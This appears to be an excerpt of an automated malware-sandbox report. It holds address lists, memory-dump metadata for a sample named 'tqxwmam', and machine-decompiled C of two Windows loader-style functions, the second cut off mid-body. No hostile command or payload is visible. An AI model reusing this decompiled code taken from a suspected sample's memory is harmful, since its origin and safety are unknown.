                                                    0x00aa4537
                                                    0x00aa453e
                                                    0x00aa4541
                                                    0x00aa454a
                                                    0x00aee255
                                                    0x00aee255
                                                    0x00aee25b
                                                    0x00aee25e
                                                    0x00aee261
                                                    0x00aee261
                                                    0x00aa4555
                                                    0x00aa4559
                                                    0x00aa455d
                                                    0x00aee26d
                                                    0x00aee270
                                                    0x00aee274
                                                    0x00aee27a
                                                    0x00aee27d
                                                    0x00aee28e
                                                    0x00aee28e
                                                    0x00aa4563
                                                    0x00aa4563
                                                    0x00aa4569
                                                    0x00aa4569
                                                    0x00000000
                                                    0x00aa455d
                                                    0x00aa450f
                                                    0x00000000
                                                    0x00aa44f3
                                                    0x00aa43ff
                                                    0x00aa4405
                                                    0x00aa4405
                                                    0x00aa4405
                                                    0x00aa42ac
                                                    0x00aa428c
                                                    0x00aa4282
                                                    0x00aa4407
                                                    0x00aa440d
                                                    0x00aee2af
                                                    0x00aee2af
                                                    0x00aa4413
                                                    0x00aa4413
                                                    0x00000000
                                                    0x00aa41d4
                                                    0x00000000
                                                    0x00aa41c3
                                                    0x00aa41bd
                                                    0x00aa4415
                                                    0x00aa4415
                                                    0x00aa4416
                                                    0x00aa4417
                                                    0x00aa4429
                                                    0x00aa416e
                                                    0x00aa416e
                                                    0x00aa4175
                                                    0x00aa4498
                                                    0x00aa449f
                                                    0x00aee12d
                                                    0x00000000
                                                    0x00aee133
                                                    0x00000000
                                                    0x00aee133
                                                    0x00aa44a5
                                                    0x00aa44a5
                                                    0x00aa44aa
                                                    0x00000000
                                                    0x00aa44bb
                                                    0x00aa44ca
                                                    0x00aa44d6
                                                    0x00aa44d7
                                                    0x00aa44d8
                                                    0x00aa44e3
                                                    0x00aa44e3
                                                    0x00aa44aa
                                                    0x00aa417b
                                                    0x00aa417b
                                                    0x00aa417b
                                                    0x00000000
                                                    0x00aa417b
                                                    0x00aa4175
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1566c933f33985e335036767b426d0b8222336000c30e2707051b91d1d3c48ef
                                                    • Instruction ID: 3f4a3c748e8f90f1222bf0879e9b820bf52849e167f0a7061a560e8e27b19737
                                                    • Opcode Fuzzy Hash: 1566c933f33985e335036767b426d0b8222336000c30e2707051b91d1d3c48ef
                                                    • Instruction Fuzzy Hash: B3F169706082518BCB24CF59C480A7AB7F1EFDA714F15892EF88ACB290E774DD85DB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AB20A0 Relevance: .4, Instructions: 420COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 92%
                                                    			E00AB20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0xb78714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E00AB2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E00AB2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E00A858EC(_t240);
									_t221 =  *0xb75cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0xb75cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E00AC4A2C(0xb76e40, 0xac4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E00AA7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0xa65c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E00ABF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E00ABF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E00B07016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L00AA2400(_t267 + 0x20);
															}
															L00AA2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E00AB2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E00AA2280(_t134, 0xb78608);
									__eflags =  *0xb76e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E00A9FFB0(_t198, _t241, 0xb78608);
										__eflags = _t253;
										if(_t253 != 0) {
											L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0xb76e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0xb78608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E00AB6B90(_t210,  &_v64);
										_t262 =  *0xb78608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E00ABE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E00AC97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E00AC006A(0xb78608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0xb78608);
												E00ACB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0xb76904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0xb76e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E00A9FFB0(_t198, _t240, 0xb78608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E00AC00C2(0xb78608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                    0x00ab20a0
                                                    0x00ab20a8
                                                    0x00ab20ad
                                                    0x00ab20b3
                                                    0x00ab20b8
                                                    0x00ab20c2
                                                    0x00ab20c7
                                                    0x00ab20cb
                                                    0x00ab20d2
                                                    0x00ab2263
                                                    0x00ab2266
                                                    0x00af5836
                                                    0x00af5836
                                                    0x00000000
                                                    0x00ab226c
                                                    0x00ab226c
                                                    0x00ab2270
                                                    0x00ab2274
                                                    0x00ab20e2
                                                    0x00ab20e2
                                                    0x00ab20e6
                                                    0x00ab20ee
                                                    0x00af57dc
                                                    0x00af57de
                                                    0x00af57ec
                                                    0x00af57ec
                                                    0x00af57f1
                                                    0x00af57f3
                                                    0x00af57f8
                                                    0x00000000
                                                    0x00af57f8
                                                    0x00af57e0
                                                    0x00af57e4
                                                    0x00af57ea
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00af57ea
                                                    0x00ab20f4
                                                    0x00ab20f4
                                                    0x00ab20f8
                                                    0x00ab20f8
                                                    0x00ab20fc
                                                    0x00ab2100
                                                    0x00ab2106
                                                    0x00ab2201
                                                    0x00ab2206
                                                    0x00ab220b
                                                    0x00ab220e
                                                    0x00ab22a9
                                                    0x00ab22ac
                                                    0x00000000
                                                    0x00000000
                                                    0x00ab22b2
                                                    0x00ab22b5
                                                    0x00af5801
                                                    0x00af5806
                                                    0x00000000
                                                    0x00000000
                                                    0x00af5810
                                                    0x00af5815
                                                    0x00af5818
                                                    0x00000000
                                                    0x00000000
                                                    0x00af581e
                                                    0x00ab22bb
                                                    0x00ab22bb
                                                    0x00ab2218
                                                    0x00ab2218
                                                    0x00ab221c
                                                    0x00ab2220
                                                    0x00ab2222
                                                    0x00ab22c2
                                                    0x00ab22c4
                                                    0x00ab22dc
                                                    0x00ab22dc
                                                    0x00ab22e1
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ab22e7
                                                    0x00ab22c8
                                                    0x00ab22cd
                                                    0x00ab22d3
                                                    0x00ab22d6
                                                    0x00af5823
                                                    0x00af5825
                                                    0x00af5827
                                                    0x00000000
                                                    0x00000000
                                                    0x00af582d
                                                    0x00000000
                                                    0x00af582d
                                                    0x00000000
                                                    0x00ab2228
                                                    0x00ab2228
                                                    0x00000000
                                                    0x00ab2228
                                                    0x00ab2222
                                                    0x00ab2214
                                                    0x00ab2214
                                                    0x00000000
                                                    0x00ab2114
                                                    0x00ab2114
                                                    0x00ab2114
                                                    0x00ab211a
                                                    0x00ab211c
                                                    0x00ab2348
                                                    0x00ab234d
                                                    0x00af5840
                                                    0x00af5845
                                                    0x00af5848
                                                    0x00af584e
                                                    0x00af584e
                                                    0x00af5848
                                                    0x00ab2353
                                                    0x00ab2355
                                                    0x00ab2388
                                                    0x00ab2388
                                                    0x00ab2368
                                                    0x00ab236a
                                                    0x00ab236c
                                                    0x00ab238f
                                                    0x00000000
                                                    0x00ab236e
                                                    0x00ab236e
                                                    0x00ab218e
                                                    0x00ab218e
                                                    0x00ab2191
                                                    0x00ab2195
                                                    0x00af5a03
                                                    0x00af5a06
                                                    0x00af5a0c
                                                    0x00af5a0f
                                                    0x00af5a11
                                                    0x00af5a13
                                                    0x00af5a13
                                                    0x00af5a19
                                                    0x00af5a1f
                                                    0x00000000
                                                    0x00ab219b
                                                    0x00ab219b
                                                    0x00ab21a0
                                                    0x00ab2282
                                                    0x00ab2284
                                                    0x00ab2284
                                                    0x00ab2284
                                                    0x00ab2284
                                                    0x00ab21a6
                                                    0x00ab21a9
                                                    0x00ab21ac
                                                    0x00ab21ae
                                                    0x00ab21b3
                                                    0x00ab228b
                                                    0x00ab2290
                                                    0x00ab2379
                                                    0x00ab2296
                                                    0x00ab2298
                                                    0x00ab2298
                                                    0x00ab2290
                                                    0x00ab21b9
                                                    0x00ab21be
                                                    0x00ab22a2
                                                    0x00ab22a2
                                                    0x00ab21c4
                                                    0x00ab21c8
                                                    0x00ab21cc
                                                    0x00ab21d0
                                                    0x00ab21d4
                                                    0x00ab21de
                                                    0x00ab21e3
                                                    0x00af5a29
                                                    0x00af5a2c
                                                    0x00000000
                                                    0x00000000
                                                    0x00af5a3b
                                                    0x00000000
                                                    0x00ab21e9
                                                    0x00ab21e9
                                                    0x00ab21e9
                                                    0x00ab21ee
                                                    0x00ab21f1
                                                    0x00af5a45
                                                    0x00af5a4b
                                                    0x00af5a52
                                                    0x00af5a58
                                                    0x00af5a5d
                                                    0x00af5a5f
                                                    0x00af5a71
                                                    0x00af5a61
                                                    0x00af5a6a
                                                    0x00af5a6a
                                                    0x00af5a76
                                                    0x00af5a79
                                                    0x00af5a7f
                                                    0x00af5a83
                                                    0x00af5a85
                                                    0x00af5a87
                                                    0x00af5a87
                                                    0x00af5a8c
                                                    0x00af5a91
                                                    0x00af5a97
                                                    0x00af5a9f
                                                    0x00af5aa0
                                                    0x00af5aa1
                                                    0x00af5aa6
                                                    0x00af5aab
                                                    0x00af5ab1
                                                    0x00af5ab3
                                                    0x00af5ab9
                                                    0x00af5aca
                                                    0x00af5ad4
                                                    0x00af5ad4
                                                    0x00af5ade
                                                    0x00af5ade
                                                    0x00af5aab
                                                    0x00af5a79
                                                    0x00af5a52
                                                    0x00ab21f7
                                                    0x00ab21f9
                                                    0x00ab21fe
                                                    0x00ab21fe
                                                    0x00ab21e3
                                                    0x00ab2195
                                                    0x00ab236c
                                                    0x00ab2122
                                                    0x00ab2122
                                                    0x00ab2124
                                                    0x00ab2231
                                                    0x00ab2236
                                                    0x00ab2236
                                                    0x00ab2238
                                                    0x00ab2238
                                                    0x00ab2240
                                                    0x00ab2242
                                                    0x00ab2244
                                                    0x00af59fc
                                                    0x00ab218c
                                                    0x00ab218c
                                                    0x00000000
                                                    0x00ab218c
                                                    0x00ab224a
                                                    0x00ab224f
                                                    0x00ab2256
                                                    0x00ab2304
                                                    0x00ab2309
                                                    0x00ab230f
                                                    0x00ab231e
                                                    0x00ab231e
                                                    0x00ab231e
                                                    0x00ab2320
                                                    0x00ab2325
                                                    0x00ab232a
                                                    0x00ab232c
                                                    0x00ab233e
                                                    0x00ab233e
                                                    0x00000000
                                                    0x00ab232c
                                                    0x00ab2311
                                                    0x00ab2317
                                                    0x00ab231a
                                                    0x00ab231c
                                                    0x00ab2380
                                                    0x00ab2380
                                                    0x00ab2380
                                                    0x00ab2384
                                                    0x00000000
                                                    0x00000000
                                                    0x00ab2386
                                                    0x00000000
                                                    0x00ab231c
                                                    0x00ab225c
                                                    0x00ab225c
                                                    0x00000000
                                                    0x00ab225c
                                                    0x00ab212a
                                                    0x00ab2134
                                                    0x00ab2138
                                                    0x00ab213d
                                                    0x00af5858
                                                    0x00af5863
                                                    0x00af5863
                                                    0x00af5867
                                                    0x00af586a
                                                    0x00000000
                                                    0x00000000
                                                    0x00af586c
                                                    0x00af586c
                                                    0x00af5871
                                                    0x00af5875
                                                    0x00af5877
                                                    0x00af5997
                                                    0x00af599c
                                                    0x00af59a1
                                                    0x00af59a7
                                                    0x00af59a7
                                                    0x00000000
                                                    0x00af59a7
                                                    0x00af587d
                                                    0x00000000
                                                    0x00af588b
                                                    0x00af588b
                                                    0x00af5890
                                                    0x00af5892
                                                    0x00af5894
                                                    0x00af5899
                                                    0x00af589b
                                                    0x00af58a0
                                                    0x00af58a0
                                                    0x00af58aa
                                                    0x00af58b2
                                                    0x00af58b6
                                                    0x00af58be
                                                    0x00af58c6
                                                    0x00af58c9
                                                    0x00af590d
                                                    0x00af5917
                                                    0x00af591a
                                                    0x00af591c
                                                    0x00af5920
                                                    0x00af5928
                                                    0x00af592a
                                                    0x00af592c
                                                    0x00af592e
                                                    0x00af592e
                                                    0x00af58cb
                                                    0x00af58cd
                                                    0x00af58d8
                                                    0x00af58e0
                                                    0x00af58f4
                                                    0x00af58fe
                                                    0x00af58fe
                                                    0x00af593a
                                                    0x00af593e
                                                    0x00af5940
                                                    0x00af5942
                                                    0x00000000
                                                    0x00af5944
                                                    0x00af5944
                                                    0x00af5949
                                                    0x00af594e
                                                    0x00af594e
                                                    0x00af5953
                                                    0x00af595b
                                                    0x00af5976
                                                    0x00af5976
                                                    0x00af597a
                                                    0x00af597f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00af5981
                                                    0x00af5981
                                                    0x00af5981
                                                    0x00af5983
                                                    0x00af5988
                                                    0x00af598d
                                                    0x00af5991
                                                    0x00af5991
                                                    0x00000000
                                                    0x00af595d
                                                    0x00af595d
                                                    0x00af5963
                                                    0x00af5965
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00af5967
                                                    0x00af5967
                                                    0x00af596b
                                                    0x00af596d
                                                    0x00000000
                                                    0x00000000
                                                    0x00af596f
                                                    0x00af5971
                                                    0x00af5971
                                                    0x00af5974
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00af5974
                                                    0x00000000
                                                    0x00af5967
                                                    0x00af595b
                                                    0x00af5942
                                                    0x00af5863
                                                    0x00ab2143
                                                    0x00ab2143
                                                    0x00ab2149
                                                    0x00ab214f
                                                    0x00ab22f1
                                                    0x00ab22f6
                                                    0x00000000
                                                    0x00ab2173
                                                    0x00ab2173
                                                    0x00ab217d
                                                    0x00ab2181
                                                    0x00ab2186
                                                    0x00af59ae
                                                    0x00af59b2
                                                    0x00af59b5
                                                    0x00af59b7
                                                    0x00af59ba
                                                    0x00af59cd
                                                    0x00af59d1
                                                    0x00af59d5
                                                    0x00af59d9
                                                    0x00af59db
                                                    0x00000000
                                                    0x00000000
                                                    0x00af59dd
                                                    0x00af59dd
                                                    0x00af59e1
                                                    0x00af59e4
                                                    0x00af59e7
                                                    0x00af59ee
                                                    0x00af59ee
                                                    0x00af59f3
                                                    0x00af59f3
                                                    0x00000000
                                                    0x00ab2186
                                                    0x00ab214f
                                                    0x00ab2106
                                                    0x00ab2266
                                                    0x00ab20d8
                                                    0x00ab20da
                                                    0x00ab20e0
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e6d55205ed0fdd212e2d29558065f967a7401001ee152e0cce4aff150cbb642d
                                                    • Instruction ID: dca24707005a0b7d902a8b6c9d17914ff25450f868d7207c8cfd59a636744960
                                                    • Opcode Fuzzy Hash: e6d55205ed0fdd212e2d29558065f967a7401001ee152e0cce4aff150cbb642d
                                                    • Instruction Fuzzy Hash: F0F13831A087419FD725CF68C8447AA7BE9AF85350F14862EFA99CB392D734DC41CB82
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A9D5E0 Relevance: .4, Instructions: 353COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 87%
                                                    			E00A9D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0xb7d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E00A96600(0xb752d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0xb77b9c; // 0x0
							_t281 = L00AA4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E00ACF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0xb77b90; // 0x77090000
								if(_t384 == 0) {
									_t353 =  *0xb77b8c; // 0x632ab0
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E00AA2280(_t200, 0xb784d8);
									_t277 =  *0xb785f4; // 0x632fa0
